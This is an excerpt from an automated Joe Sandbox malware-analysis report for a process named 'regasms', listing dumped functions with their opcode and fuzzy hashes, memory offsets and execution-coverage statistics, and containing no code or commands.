                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 655ecb9e54d67d78c509d284364c06d2843696f9e3390cd3d348e080af2b4902
                                  • Instruction ID: 70898d8da4f72ab0249a7241b4042ce1463a035b456cb2d304711dbe6a89a40c
                                  • Opcode Fuzzy Hash: 655ecb9e54d67d78c509d284364c06d2843696f9e3390cd3d348e080af2b4902
                                  • Instruction Fuzzy Hash: DBE0D8F64CD3D48FE7C252B408712F13F29BE995007386487D00BCF186F51E840966C6
                                  Function 06E12AC7 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b0184933ae2f52ff1bb4cf1378ca8836be918ae88e7e9cb85a9fba29c1af3492
                                  • Instruction ID: c9b119074dd05878d8dd6ece5cb1025bb78aed29fcc52da0120da13b27157dcb
                                  • Opcode Fuzzy Hash: b0184933ae2f52ff1bb4cf1378ca8836be918ae88e7e9cb85a9fba29c1af3492
                                  • Instruction Fuzzy Hash: ECE09275600B089BC720CE5AD885E8BB7F4FF88260B40C83AF80DCB601DA30D505CB90
                                  Function 06E120C8 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1712d3e31917a588431087c4b51c45f33b62e3c72dda1f6bf0594d7d9afc5778
                                  • Instruction ID: 931effaca889dbf8636510019c3ccce42f63f5492df6c091cfe6d647f68ea2e0
                                  • Opcode Fuzzy Hash: 1712d3e31917a588431087c4b51c45f33b62e3c72dda1f6bf0594d7d9afc5778
                                  • Instruction Fuzzy Hash: F6E0C2B2B902085BE300AAB5D847B7532AEEB85658F46C020A209CE7C0EE28D542D210
                                  Function 06E10DE8 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cdc5ddd47da477677e41417044126ae85b359a4bdb4431d75493c34a12cd4cc1
                                  • Instruction ID: 6f014dae71c66aaa88f06a0e3933b3aaac8f907b4373a02c8aa42bdb458c3eb5
                                  • Opcode Fuzzy Hash: cdc5ddd47da477677e41417044126ae85b359a4bdb4431d75493c34a12cd4cc1
                                  • Instruction Fuzzy Hash: 62E01A31A14A1C9ECB90EE35C9487DF3BE8AB05214F40C13AE8499E101EB30D2D89F81
                                  Function 06E17D58 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96d340e71de0ec84ca1f733175251d863d2ad8fcbb500336d405628bb97c8722
                                  • Instruction ID: 8c1bf016141bd5a7f7a1191b0efc705660c476d310f96243ead74f81a6859be3
                                  • Opcode Fuzzy Hash: 96d340e71de0ec84ca1f733175251d863d2ad8fcbb500336d405628bb97c8722
                                  • Instruction Fuzzy Hash: FEE092309D93588EDBC0567480142757A7397C3B4AF18D0ADC0990E586C77FC483DF92
                                  Function 06E1B97F Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8bd7fb9f92572f5608f805fbbae758fcad965d84ee5c165d99136390d2db836
                                  • Instruction ID: f66d7f659d169403d7632fc64af7bde5f93bdf59a4c7156fddd2d07ac88d3cc6
                                  • Opcode Fuzzy Hash: d8bd7fb9f92572f5608f805fbbae758fcad965d84ee5c165d99136390d2db836
                                  • Instruction Fuzzy Hash: E6E05B35D1C30CCF77D0469954722FD36AD67781617407596AC4B8D605EA22882376E7
                                  Function 06E18140 Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 209cb20a9a590f40757693dc505b1be602834e85841df7c5189e56f085b14522
                                  • Instruction ID: eabd9add46f74d8cffa88702bc4e70f1d1ece4e5c7e51b9b3a4d2ec60df0f51a
                                  • Opcode Fuzzy Hash: 209cb20a9a590f40757693dc505b1be602834e85841df7c5189e56f085b14522
                                  • Instruction Fuzzy Hash: 14E09234509745CFE342DB64C8556677BB1EF46214F05C48694558F2A7CA349C0AD791
                                  Function 06E18EE8 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ceafb7a6a8bee2e51fa58a70370033684d73eec44eab0fa2cba470893636e741
                                  • Instruction ID: fe5a2380c1a566c5422b5ec8f99bea5369c17cc337dffa3865d6bad13a67a5fe
                                  • Opcode Fuzzy Hash: ceafb7a6a8bee2e51fa58a70370033684d73eec44eab0fa2cba470893636e741
                                  • Instruction Fuzzy Hash: EBD05E30A2C30CEF77D0AAD858005FB77ABE68C1007606983B91B8FA44DA314E1177EB
                                  Function 06E19D88 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9636e69dbbdef66981b4a1fbb2caac87644ac775bb0351f9534342e18a81dc4
                                  • Instruction ID: cecb08ca3e0534d061ab39cf5823ec4c978ace50e8ff55fca2c98269f8b8f247
                                  • Opcode Fuzzy Hash: f9636e69dbbdef66981b4a1fbb2caac87644ac775bb0351f9534342e18a81dc4
                                  • Instruction Fuzzy Hash: C7D05E3461C308CFF7C832B45439AF975AAABC0211B0070A1A04F8E687DE268C51AED2
                                  Function 06E1B8F8 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d2b05ed0bd2c02e8f4a56dad467e3861ab31938156debeddc9a3455126f450f6
                                  • Instruction ID: 4296ba3f7b7b73b2f7885557762ee3514c68caf5f00801fcf24a4a511e24ee79
                                  • Opcode Fuzzy Hash: d2b05ed0bd2c02e8f4a56dad467e3861ab31938156debeddc9a3455126f450f6
                                  • Instruction Fuzzy Hash: 0FD01734E0C30CEF63E0AA9954716BD36ACA7781217146982A80B8F204DA210903B6E3
                                  Function 06E1C0D6 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c718383d7715714bfb41b42e239d0298d0eae416b668b10713ec30d6e46b855e
                                  • Instruction ID: bd49a11162e879c746d86d7d65e1ea446154825ea1269a2845af8f7b7843a4ad
                                  • Opcode Fuzzy Hash: c718383d7715714bfb41b42e239d0298d0eae416b668b10713ec30d6e46b855e
                                  • Instruction Fuzzy Hash: 0CE01DB0ACC308DFA3A04B9455136F53765AB88A01F3095479507DF644EA29495166C2
                                  Function 06E1C2E0 Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8baed3173aa1e6fc67628b6c82dbe46c379d92a61d0ed5bfe5e39e273c30f0e6
                                  • Instruction ID: 12eeb0921302e9db52a4527c17fc6a06e68408d659800373b7ffbdb3d4dde5dc
                                  • Opcode Fuzzy Hash: 8baed3173aa1e6fc67628b6c82dbe46c379d92a61d0ed5bfe5e39e273c30f0e6
                                  • Instruction Fuzzy Hash: 65D05EB288CBC8DFE79243D014664E43F24852B90132634A7E04BEF842900D0843EAD3
                                  Function 06E1AE9E Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3ae64eb191fc24761ea15ac449646e9bc18e0106bfc86b9151d5cc901558111
                                  • Instruction ID: b71f7a943ddf6276e9938598532fac498a13137bbc556298b34514366e39d8e7
                                  • Opcode Fuzzy Hash: a3ae64eb191fc24761ea15ac449646e9bc18e0106bfc86b9151d5cc901558111
                                  • Instruction Fuzzy Hash: 3AE04F70E057458FD305DF6489662AABBB17F42220B15C066D0258A211D730094997D2
                                  Function 06E10DF8 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 321c0e5af772d93640ac02ee1af4ccb8f55753e297aa91b85a484ef189c07ff7
                                  • Instruction ID: 4f0549d3a6e4a374566d1e2aa507d4cd67d2182848c5ec2383c20409875349ea
                                  • Opcode Fuzzy Hash: 321c0e5af772d93640ac02ee1af4ccb8f55753e297aa91b85a484ef189c07ff7
                                  • Instruction Fuzzy Hash: E8E0E23192071C9E8B80EE79D90859E7BE8AB05224F00D52AE8499A110EA30E2E8DF81
                                  Function 06E16681 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0095391efa9768121c8c1b639ff824d819010bc7ba065cdde7c24f396b508038
                                  • Instruction ID: 4af827f35c0cf48d9362da05286a9cc063712c2d42154b0239bc1925eed62f4c
                                  • Opcode Fuzzy Hash: 0095391efa9768121c8c1b639ff824d819010bc7ba065cdde7c24f396b508038
                                  • Instruction Fuzzy Hash: BDD0123801E3CABFD35213B1AC0A8F33F2C4A0326034A00C3F846CD053C90A28A892F3
                                  Function 06E120D8 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7758875061a4619d3c69251a6c7362e979e6a9a1d55f60919734016205563366
                                  • Instruction ID: 902542c6611985cd8dee58eee9db449dac86ebad31c4508a09177dad476bd638
                                  • Opcode Fuzzy Hash: 7758875061a4619d3c69251a6c7362e979e6a9a1d55f60919734016205563366
                                  • Instruction Fuzzy Hash: 71D0A7307503084BA3046FB658077B937EEABC4615341C024B609CA1C0DF24D581D221
                                  Function 06E1C0A0 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecfa782d08d711e6c0a8d5fd8cb78f483c7516065fe458b8432b1b87896da0e3
                                  • Instruction ID: 4dedd2d4fca89f088e68f2b30fdf85bf04b8d4e67376df3c8b700f7194f6e006
                                  • Opcode Fuzzy Hash: ecfa782d08d711e6c0a8d5fd8cb78f483c7516065fe458b8432b1b87896da0e3
                                  • Instruction Fuzzy Hash: ACC012F86CC74CCF73C092D814256F8355D6588E003307006920BCD181FA1A880125D7
                                  Function 06E1E318 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c20eb1d7269942be3b62389b98aa2adbea3e89cec57b9311c301a7351961ed54
                                  • Instruction ID: 0f3bcb11b90d942c9e23ea77ccae0a9e74574b53ab5e031423b450aea9f951fa
                                  • Opcode Fuzzy Hash: c20eb1d7269942be3b62389b98aa2adbea3e89cec57b9311c301a7351961ed54
                                  • Instruction Fuzzy Hash: 57C08C3100270ACBE2142BD5B60C32836AE6B40206F451010E609824708B7214C5C626
                                  Function 06E1BCB0 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e9c4fb1ecdfa11cefc94f3c88fc91ad8e62eb8257b2caa5796eb0c3446a4fbff
                                  • Instruction ID: 72120b4ddccaf3567c92d8cd4ac83446f055a0f21a367161438c2483d2746981
                                  • Opcode Fuzzy Hash: e9c4fb1ecdfa11cefc94f3c88fc91ad8e62eb8257b2caa5796eb0c3446a4fbff
                                  • Instruction Fuzzy Hash: AAD01271409251DFD300CB51DD96D8A3FF0BF1D3403041989D0055B362D330B411DB84
                                  Function 06E1C2F0 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f616325bf8023733a581aae9383e1c7901c447bb9c8a0e1636405b7f8b775868
                                  • Instruction ID: 43b9794521ed035bc5de5c04c09ce7d0650e8199841c37a3c800895dd66827d0
                                  • Opcode Fuzzy Hash: f616325bf8023733a581aae9383e1c7901c447bb9c8a0e1636405b7f8b775868
                                  • Instruction Fuzzy Hash: 29B092381CCF4CDF27C023D420295F53A1C600FE007303412A10BEF8010A091852E4D2
                                  Function 06E1770C Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b23a5210ed802af6f61f04036f176ca27b54e55de8afc05b580a259ba3568ec
                                  • Instruction ID: 179524db9ac2329ecc05c800aa9101f4b6bb021092cc2346d2031dc0060a08db
                                  • Opcode Fuzzy Hash: 1b23a5210ed802af6f61f04036f176ca27b54e55de8afc05b580a259ba3568ec
                                  • Instruction Fuzzy Hash: 98B01235199700EF698163F84C84A7E6154FFB1B01F40AD123708480608575482DF317
                                  Function 06E1B9C1 Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb122cd1a81a300e6224026fe5b9dc33f8dcba307b4978cf2f8880770fef60a5
                                  • Instruction ID: 89afe179f5d64b0428ba98469689a392417cb81bddcf953fc812ceab2db1c6c0
                                  • Opcode Fuzzy Hash: cb122cd1a81a300e6224026fe5b9dc33f8dcba307b4978cf2f8880770fef60a5
                                  • Instruction Fuzzy Hash: 86C08C30B4030AEFFB408B11DF429AD32627B10B00F002010B2023E284E36145418A80
                                  Function 06E16690 Relevance: .0, Instructions: 7COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4144ad29f09102f61df699c071e08b349b83f979faaf416d3eb8a425f2f29120
                                  • Instruction ID: ce17ab1c8fcf3422234307a8bb1d214da863b215a69e1e2c032537c5416bb6af
                                  • Opcode Fuzzy Hash: 4144ad29f09102f61df699c071e08b349b83f979faaf416d3eb8a425f2f29120
                                  • Instruction Fuzzy Hash: F5A0113002830ECEA3882382A0080BA3B2C22002883002000FA0B0C0022A2B38A820CA

                                  Non-executed Functions

                                  Function 08876D08 Relevance: 8.0, Strings: 6, Instructions: 490COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1437095337.0000000008870000.00000040.00000800.00020000.00000000.sdmp, Offset: 08870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8870000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'q$4'q$4'q$4|q$4|q$$q
                                  • API String ID: 0-3102600102
                                  • Opcode ID: 8725397b05d2a34b647dfea5a438c6cb7b29baa622b07c4f4e6efa312f8bf697
                                  • Instruction ID: 0a75455205f4fa395d3183436be89dc8c04662fb2b9094a85dc54cbd86ad46bd
                                  • Opcode Fuzzy Hash: 8725397b05d2a34b647dfea5a438c6cb7b29baa622b07c4f4e6efa312f8bf697
                                  • Instruction Fuzzy Hash: E0F1E135B04615CFDB29EF68C484A6E7BF2AF85302B29806DE416DB761DB31DC42CB91
                                  Function 07224BB8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +d~
                                  • API String ID: 0-1217840463
                                  • Opcode ID: 4c891e904437d1ea7e6281008d7860d6edfc9c7852c3130a2e5ae51dbd1feb87
                                  • Instruction ID: 6db42faef639a9f4482167ff415a2d31e351b7bb971a209020946d78655f89db
                                  • Opcode Fuzzy Hash: 4c891e904437d1ea7e6281008d7860d6edfc9c7852c3130a2e5ae51dbd1feb87
                                  • Instruction Fuzzy Hash: 8AE11CB4E102599FDB14DFA8C580AAEBBF2BF89305F24C169D814AB359C7309D42DF61
                                  Function 05850130 Relevance: .3, Instructions: 315COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc9e9e7d6ac72dc8849ee40527f53fcadbab2e233eca8e4efc653e76d50b9544
                                  • Instruction ID: e2b0532c1ce5655e6e24ddcb55b064a316d988ad3094c7afd26213b86a4e5499
                                  • Opcode Fuzzy Hash: bc9e9e7d6ac72dc8849ee40527f53fcadbab2e233eca8e4efc653e76d50b9544
                                  • Instruction Fuzzy Hash: 951272F2401F459EE712CF66ED4C28A7BB1BB85318B90460BD2617A2F5DBB8154ECF84
                                  Function 07224FF0 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 850336ede45438136f07d33ff9d79edad724a80a41c8b69b8da97cb96cccf15d
                                  • Instruction ID: 1640ae0204869685858909ff0e46f291981d39c1ef30cbb5aa0049cfc8ef0f7a
                                  • Opcode Fuzzy Hash: 850336ede45438136f07d33ff9d79edad724a80a41c8b69b8da97cb96cccf15d
                                  • Instruction Fuzzy Hash: 17E11AB4E102199FDB14DF99C580AAEFBF2BF89305F24C169D804AB359D7309942DFA1
                                  Function 07223918 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e72717a65ab8f1888069114b1a25b451d40a28ffb05d5cfaf7384c4caec88a38
                                  • Instruction ID: 867025813e8c6640527bce1a6d2b4f76220fbaf407d6decd18d3f37b206da8cf
                                  • Opcode Fuzzy Hash: e72717a65ab8f1888069114b1a25b451d40a28ffb05d5cfaf7384c4caec88a38
                                  • Instruction Fuzzy Hash: 21E11BB4E102199FDB14DFA9C580AAEFBF2BF89301F24C169D404AB356D7349942DFA1
                                  Function 072230A8 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: db81a57a311e8fed2680cb500446628af00f60a01a77f2368c73289987f3cdb1
                                  • Instruction ID: 0f219de230fe13a07c21af479cd34c94395af6844eec5c628075baad51cc716d
                                  • Opcode Fuzzy Hash: db81a57a311e8fed2680cb500446628af00f60a01a77f2368c73289987f3cdb1
                                  • Instruction Fuzzy Hash: 1BE11CB4E102199FDB14DF98C580AAEFBF2BF49305F24C169D404AB356C7349942DFA1
                                  Function 072234E0 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b5dddd381b12e8fcaef326e8715a02a7f0878d5dd1699e3adaca968c6c1f07fa
                                  • Instruction ID: ec23f05e77d9b3f39824f994770c77a669cdb8b1095d2804743b20dc0eea3f71
                                  • Opcode Fuzzy Hash: b5dddd381b12e8fcaef326e8715a02a7f0878d5dd1699e3adaca968c6c1f07fa
                                  • Instruction Fuzzy Hash: F5E129B4E102199FDB14DF98C580AAEFBF2BF49305F24C169D814AB35ACB349942DF61
                                  Function 00A1E124 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f8e52d9ec549d73797604fecf295828040f907650e9e7c6ba0e755ef8b80a63
                                  • Instruction ID: b3a7d50e91afff1190ed2e32f99cc4e49553c4f09828da4344986f8fb06bfe59
                                  • Opcode Fuzzy Hash: 7f8e52d9ec549d73797604fecf295828040f907650e9e7c6ba0e755ef8b80a63
                                  • Instruction Fuzzy Hash: 21A15D32E002099FCF09DFB5D9445DEB7B2FF85300B15857AE805AB265EB31E996CB80
                                  Function 05850120 Relevance: .2, Instructions: 233COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d9e5bab42a1f91fe02b22abf327cb4b9e9104dd7f2f4c17b15169cd38b1f47e
                                  • Instruction ID: f3cc437f94e305395ce444cd80ad31cb5df8887580d8d94d25e651b498dc9835
                                  • Opcode Fuzzy Hash: 3d9e5bab42a1f91fe02b22abf327cb4b9e9104dd7f2f4c17b15169cd38b1f47e
                                  • Instruction Fuzzy Hash: 7BC1E8B2801B458FD712CF6AEC4828A7BB1BB85324F55460BD2617B2F4DBB4558ECF84
                                  Function 07224FE0 Relevance: .1, Instructions: 135COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c08a9cc9298897dd7ca4226aa69e9dad90268e8fa35993ccd69c2f90ef29532e
                                  • Instruction ID: 9b3577d700750508d9725b9307eacbfe4a53a852a3ecc41c86ef8f93db1e3c32
                                  • Opcode Fuzzy Hash: c08a9cc9298897dd7ca4226aa69e9dad90268e8fa35993ccd69c2f90ef29532e
                                  • Instruction Fuzzy Hash: E9512CB4E102199FDB14CFA9C9805AEFBF2EF89301F24C169D418AB215D7309942DFA1

                                  Execution Graph

                                  Execution Coverage:9.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:173
                                  Total number of Limit Nodes:4
